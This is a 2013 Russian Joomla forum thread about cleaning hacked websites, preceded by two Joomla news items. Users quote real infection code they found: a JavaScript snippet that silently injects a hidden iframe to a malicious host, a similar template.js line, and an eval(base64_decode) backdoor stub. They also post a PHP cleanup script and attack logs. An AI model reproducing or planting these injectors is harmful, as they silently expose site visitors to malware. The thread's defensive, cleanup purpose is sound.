Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

0 Пользователей и 1 Гость просматривают эту тему.
  • 299 Ответов
  • 189232 Просмотров
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
тоже не уверен, тут написано про сканер
еще вижу Ваши познания и плюс то что вы все перепробывали
сканера помогают тем кто хоть малость понимают с чем боряться, и анализируют эту проблему, понимая что к чему
просто так нажал кнопку и все зае... нет и не будет
можете антивирус включить он вам вырежет ненужные файлы, потом увидим топики мол сайт после чистки не работает, в прочем как каждая вторая у тех кто не понимая сами чистят, через месяц-два потраченного времени, обращаются к тем кто разбирается в этой тем
кстати в разделе безопасности много расписано, если нет вашего конкретного случая не отчаиваться, он есть поверти, просто другими файлами и кодом описан, прочитав можно простым анализом напрягая мозг чуть-чуть совсем, понять что искать и как бороться
« Последнее редактирование: 28.03.2013, 12:02:13 от flyingspook »
*

wishlight

  • Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Да... Иногда всего лишь чуть-чуть достаточно. Правда если сайтов в аккаунте 100500, тогда ass.
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
Очередное хулигантство и я чет никак не могу вредный код JS засунуть в код реплейсера, подсобите:

Код
<?php
$root  =  $_SERVER['DOCUMENT_ROOT'];
$search = '[b]СЮДА[/b]'; //строка, которую нужно найти в каждом файле и заменить на ''
$thisfile = 'rep.php'; //чтобы в процессе не заменить искомую строку в этом же файле
function find_and_replace($dir,$search,$thisfile)
{

$new_dir = null;
$dir_files = opendir($dir);
    while(false !== ($file = readdir($dir_files)))
    {

        if($file != '.' && $file != '..')
        $new_dir[] = $dir."/".$file;
    }

        if($new_dir)
        foreach($new_dir as $check )
        {
              if((is_file($check)) && (basename($check)!== $thisfile) && ( (strtolower(substr($check,-4)) === '.tpl') || (strtolower(substr($check,-5)) === '.html') || (strtolower(substr($check,-3)) === '.js'))) {
                $handle = fopen($check, "rb");
                $contents = '';
                while (!feof($handle)) {
                  $contents .= fread($handle, 8192);
                }
                fclose($handle);
                if (strpos($contents,$search)!== false) {
                    $file = fopen ($check,"w+");
                    $str = str_replace($search,'',$contents);
                    fputs($file, $str);
                    fclose ($file);
                    echo $check."<br>";
                    }
              }
              elseif(is_dir($check))
              find_and_replace($check,$search,$thisfile);
        }
}
find_and_replace($root,$search,$thisfile);


JS код заражения:

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function papirosa(){
 var denyList = ['Chrome'];
 var denyUA = false;
 for (var i in denyList) {
  if (stripos(navigator.userAgent, denyList[i])) {
   denyUA = true;
   break;
  }
 }
 return denyUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!papirosa()) {
 var cookie = getCookie('b19ad018sc');
 if (cookie == undefined) {
  setCookie('b19ad018sc', true, 292200);
  document.write('<iframe height="116" style="position:absolute;left:-1000px;top:-1000px;" width="116" src="http://jivemessageoriented.ru/iy7yhd.dgaPnykU?default"></iframe>');
 }
};
})();/*eaa795220*/
*

RazarioAgro

  • Захожу иногда
  • 473
  • 4 / 0
А можете по подробнее объяснить для новичков, что значит при сканировании:

String:: confirm(
String:: $_POST[
String:: phpinfo()

Как я понял все файлы кроме этих является вирусами и нужно их удалять либо править. Но а эти файлы String:: confirm(, String:: $_POST[, String:: phpinfo() их тоже нужно проверять либо они в  порядке? И как они класифицируются, переводятся, пост, конфирм и т.д., что все это значит?
*

wishlight

  • Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
phpinfo()
$_POST

В общем функции php. Проверять надо все.


12.4.4 последний уязвимый NoNumber Framework по заверениям автора. Для тех кому надо.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
все описано на сайте вся работа со сканером
а прочитать топик нет сил надо схватить и объясните что мне делать
сканер сканирует на предмет наличия функций в коде, универсального ни чего нет, сканер еще раз объясню не антивирус, а помощь при поиске, слово сканер Вам что то говорит, все что показывает сканер надо проверять глазиками вот весь принцип работы
сканер показывает не то что это плохо а все что есть т.к. то что плохо можно написать по разному но вхождение переменной ни куда не денется, а код в ней измениться может как угодно

если вам нужна кнопка "сделать все за...." такого нет и не будет
если просто просмотреть и не понять что делать интуитивно или не найти описание, это уже слишком

может чуть грубо но писать каждую неделю ответ на один и тот же вопрос слишком, еще и когда все понятно и описано прежде и не раз
*

ankoch

  • Захожу иногда
  • 498
  • 50 / 1
Присоединяюсь, пока заочно  ^-^ . В общем стучится постоянно какая-то гадость (до 500-700 обращений в час), в логах, примерно такие записи
Код
www.site.ru 37.9.53.57 - - [07/May/2013:18:20:35 +0400] "GET /administrator/index.php HTTP/1.1" 200 7983 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10" 0
www.site.ru 37.9.53.57 - - [07/May/2013:18:20:36 +0400] "POST /administrator/index.php HTTP/1.1" 200 277 "http://www.zernogradinfo.ru/administrator/index.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10" 0
Глянул - это какой-то Богдан Шедуляк, страна - Россия:
Спойлер
[свернуть]

Запретил его в htaccess Deny from 37.9.53.57 - пошли у него ошибки 403. Так может чего успел пропихнуть сука? Ответ сервера был 200. Днем проверял всеми способами, которые указаны в этой теме - ничего не нашел.
Joomla 3.1.1, NoNumber нету.
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Очередное хулигантство и я чет никак не могу вредный код JS засунуть в код реплейсера, подсобите:
попробуйте моим скриптом http://secu.ru/scripts/find-and-replace, отметьте "Искать по маске", в "Текст поиска" введите
Код
\/\*214afaae\*\/.*?\/\*eaa795220\*\/
*

0du14ik

  • Новичок
  • 6
  • 0 / 0
Сегодня проверил бесплатной версией этой утилиты один свой сайт. Утилита указала на shell, находящийся в файле статистики, в папке webstat. Эта папка по-умолчанию создаётся в корне хостинга, если у вас используется на хостинге ISPmanager. Получается сам хостер раздаёт shell?
*

Leyzif

  • Осваиваюсь на форуме
  • 19
  • 4 / 0
Просканировала сайт, удалила всю бяку, просмотрела все файлы php на наличие кода, вроде все чисто, но в папке кэша появляются вот такие строки:
public_html/cache/page/11cde0d0b1d50fda1b9521e6fd89d343-cache-page-b4e191dbf08670b2e7f41ddd8e35b87a.php
String:: c99
/cache/page/11cde0d0b1d50fda1b9521e6fd89d343-cache-page-64b03a3c7d1f5fc66bfadf9889844fe9.php
String:: c99
Я так поняла, что это бекдор? Но тогда почему он именно в кэше? В других папках ничего нет. :'(
*

wishlight

  • Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Это куски кеша. Почти 100% ничего страшного. Хотя код под спойлер можно выложить.
*

koless88

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
привет всем.
я не профи в кодах. если есть люди добрые, помогите пожалуйста)
взломали сайт на Joomla 1.5. хостеры написали что с моего сайта отсылается спам.
в файле access_log видны запросы, стабильно через какое то время их два
 190.131.111.223 teplocool.ru - - [30/May/2013:23:46:46 +0400] "POST /administrator/language/ru-RU/db.php HTTP/1.1" 404 24098 "-" "Mozilla/5.0" 3916 0
92.160.179.152 teplocool.ru - - [30/May/2013:23:47:50 +0400] "POST /administrator/components/com_jce/cpanel/views/cpanel/tmpl/include.php HTTP/1.1" 404 25376 "-" "Mozilla/5.0" 4972 0
и что еще непонятно, в БД нет такого пути, administrator/components/com_jce/cpanel/views/cpanel/tmpl/include.php. красным отметил папку которой не существует, а вот дальше все есть - views/cpanel/tmpl/include.php
файлы php удалил.  обновил Joomla, обновил компонент com_jce. но запросы продолжаются.  залил в корень файл сканера fls.php но для меня видимо как мартышка и очки)
какие варианты возможны? как излечиться) удлил даже компонент JCE но запросы продолжаются

« Последнее редактирование: 01.06.2013, 23:50:57 от koless88 »
*

Aquasonick

  • Захожу иногда
  • 314
  • 1 / 7
  • Пока семь раз отмеришь - другие уж сожрут.
Цитировать
Просьба к тем кто находит у себя при чистки заразу Shell и BackDoor пишите в ЛС она нам нужна для расширения библиотеки.
завтра накидаю.)
жаль самое интересное снёс уже .)
Цитировать
файлы php удалил.  обновил Joomla, обновил компонент com_jce. но запросы продолжаются.  залил в корень файл сканера fls.php но для меня видимо как мартышка и очки)
какие варианты возможны? как излечиться) удлил даже компонент JCE но запросы продолжаются
У меня часто в images попадаеет файл с форматом php. Проверь на всякий случай.
*

SDKiller

  • Живу я здесь
  • 2705
  • 329 / 5
  • ...ergo sum
У меня часто в images попадаеет файл с форматом php

Проверяйте компоненты, позволяющие загрузку файлов пользователям.
Стандартный com_media и редактор JCE проверяют mime и не пропускают, даже если файлы переименовали для маскировки, назначив расширения .jpg, .png и т.п.
*

Aquasonick

  • Захожу иногда
  • 314
  • 1 / 7
  • Пока семь раз отмеришь - другие уж сожрут.
Проверяйте компоненты, позволяющие загрузку файлов пользователям.
Стандартный com_media и редактор JCE проверяют mime и не пропускают, даже если файлы переименовали для маскировки, назначив расширения .jpg, .png и т.п.
Да я знаю. Они через ftp грузят. Взлом идёт через шел возможно.
*

Aquasonick

  • Захожу иногда
  • 314
  • 1 / 7
  • Пока семь раз отмеришь - другие уж сожрут.
Прверил пару сайтов. Везде примерно одно и тоже:
Спойлер
[свернуть]

Так и не понял. Это подозрение на заражение или по факту там есть вредоносный код? Или это просто так??
*

mysuccess

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Приветствую всех
Мой (арендуемый) сервер заражен аналогичным вирусом.
Раньше дописывал в js код, который не видел Яндекс.
После сообщений Вебмастера.Яндекса о заражении сайтов, обнаружил много пораженных .php файлов. (index.*, forum.* и др., упомянутые выше)

Помогите разыскать источник заражения. Предпринимавшиеся меры в итоге привели к начальному результату - повторному заражению.
Чистить файлы сканированием можно, но на своем примере скажу: угрозу искоренить не удалось.

Взываю о помощи, прошу совета, где искать источник.
Я уже подумываю о полном переносе сайтов на другой хостинг. А их не мало =(

Выкладываю несколько скриптов (один из js, второй из index.php, а также найденный мной в папке images файл php, на совершенно НОВОМ сайте (в мае запустили).

images/index.php с НОВОГО сайта (cms: cs-shop)
Код
<?php	                                       			eval(base64_decode("..."));
    header('Location: ../index.php');
?>

index.php верхняя строчка кода с самого уважаемого на хостинге сайта (cms: joomla 1.7)
Код
<?php	                                       			eval(base64_decode("..."));
/**
* @version
...

/templates/template/js/template.js Последняя строчка - такую еще не видел - что-то новое блин ((, (cms: joomla 2.5)
Код
})(jQuery);;document.write('<iframe style="position:fixed;top:0px;left:-500px;" height="120" width="120" src="http://vzklg.ddns.name/25d39654ba9eceeda.wnUrSfm6aRHxqpN4?default"></iframe>');
p.s.: [s]тут была раньше белиберда с base64_decode[/s]

очень надеюсь на Ваши мысли, идеи, комментарии и помощь в поиске и удалении источника заражения сайтов на сервере =(
« Последнее редактирование: 06.06.2013, 22:15:06 от flyingspook »
*

Aquasonick

  • Захожу иногда
  • 314
  • 1 / 7
  • Пока семь раз отмеришь - другие уж сожрут.
Вы их так сюда больше не выкладывайте. В эту тему теперь зайти никто не может.))
Мне пришлось антивирус отключать, чтобы вам ответить.))
В общем могу дать только один совет, это попробовать скачать антивирус OSE плюс анти хак OSE и перед этим посканируйте сами файлы, а также то, что ввели попробуйте через replace найти и удалить.
Или готовьте несколько тысяч мастерам.
Я вобщем сам чищу. Пока удачно.
*

mysuccess

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Прошу прощения за выкладку полного кода вирусов. Кто-то выше постоянно просил показать код здесь. Я решил сразу и показать  8)

Переписывал сайты с хостинга в течение 48 часов подряд  :o (не заархивированные, о чем сейчас жалею - в архиве было бы быстрее)
Вчера всё переписалось   8)
Не подумав перед этим установил антивирус Касперский Кристал
Он ругался при каждом скаченном файле, лечил чего-то и т.д. Я в шоке. Наверно поэтому так долго.

Вот думаю, напортачил ли Каспер с моими файлами. Что мне теперь с ними делать и можно ли их использовать дальше на сервере =((((
Дело в том, что бэкапа до заражения у меня нет аще. Только древний за позапрошлый год))
К тому же, честно признаюсь, я, вероятно, сильно запустил вирусную активность на сервере. Сообщения и первые "ласточки" появлялись еще в конце 2012 года   (чур не падать со стульев ;D)
По начало особо не мешало. Всё работало как надо. А начались действительно серьезные проблемы только спустя 4 месяца (в марте-апреле 2013).
Пишу это тем людям, которые забивают на вирусы как это сделал я и надеются на русский авось)))
Делать так не надо!
Лечитесь сразу

В общем сейчас у меня такая ситуация:
  • Все сайты помечены яндексом как Вирусные.
  • Скачал бэкап, которому доверять не могу на 100% по указанной выше причине.
  • Собираюсь сделать копию баз данных всех сайтов (где там искать - вообще не знаю - подскажите пожалуйста)
  • Пробегусь по скаченному поиском и заменой через Notepad++ или TotalCmd-подобные
  • Просмотрю как можно больше сообщений о вирусной активности, найденной в процессе скачивания сайтов с хостинга Касперским - приму меры.
  • Очередной раз сменю все пароли
  • Уже сменил FTP-клиента (была Filezilla с сохраненным в ней паролем к серверу) стала (Win SCP вроде называется) - пароль не сохраняю.
  • Планирую покупать Касперского Кристал (сейчас стоит демо на 30 дней).
  • Планирую сменить сервер на хостинге (один закрою, другой открою)

Что можно сделать еще ?
Посоветуйте пожалуйста. Я за этим сюда пришел. Спасибо!
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
а я вот однаружил на 2.5. в корне какой то файлик robots.txt.dist....вроде нормальное содержимое но от куда он?

# If the Joomla site is installed within a folder such as at
# e.g. www.example.com/joomla/ the robots.txt file MUST be
# moved to the site root at e.g. www.example.com/robots.txt
# AND the Joomla folder name MUST be prefixed to the disallowed
# path, e.g. the Disallow rule for the /administrator/ folder
# MUST be changed to read Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /logs/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/

*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
voland можно его удалить? а то мозолит мне глаз он...или как?)
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
*

Ecspert

  • Захожу иногда
  • 426
  • 12 / 0
Какой програмой можно проверить файлы сайта, скачав их на комьютер? Типа (spybot, adware, etc)
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Какой програмой можно проверить файлы сайта, скачав их на комьютер? Типа (spybot, adware, etc)
Проверяйте чем хотите - половину проблем не найдёте. Это не Касперский, здесь думать нужно (с) wishlight
Другими словами - никакого универсального и надёжного средства или способа нет и пока не предвидится.
« Последнее редактирование: 12.06.2013, 07:40:25 от WebDisaster »
*

Alukard

  • Захожу иногда
  • 101
  • 1 / 0
Добрый день! Недавно сайт опять начал переадресовывать. Поменял пароль на админку, та ftp. Однако теперь ничего не могу закачать по ftp. Т.е. подключение есть, дерево каталогов я вижу, но при попытку закачки(в данном случае файл со скриптом) FileZila выдает что превышено время ожидания, а сам файл остается в папке с размером 0кб. Подскажите пожалуйста, что делать, или дайте ссылку на тему.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Поменял пароль на админку, та ftp. Однако теперь ничего не могу закачать по ftp. Т.е. подключение есть, дерево каталогов я вижу, но при попытку закачки(в данном случае файл со скриптом) FileZila выдает что превышено время ожидания, а сам файл остается в папке с размером 0кб.
Нет прав на запись в директорию. Проверяй владельца файлов, и стучи к хостеру.
*

Alukard

  • Захожу иногда
  • 101
  • 1 / 0
Хостер говорит, что с его стороны всё нормально. Опытным путём выяснил, что такая беда происходит, если размер файла больше 2кб(меньше закачивает). В чем может быть дело?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Обманывает твой хостер. Проверь в админке- Права на папки
*

Alukard

  • Захожу иногда
  • 101
  • 1 / 0
Точно обманывает! Написал им снова, через 2 часа всё норм стало. Говорят у меня проблема с файлзилой была)
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3186
Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 268500
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 2769
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 1048
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 2436
Последний ответ 03.11.2020, 17:36:03
от Cedars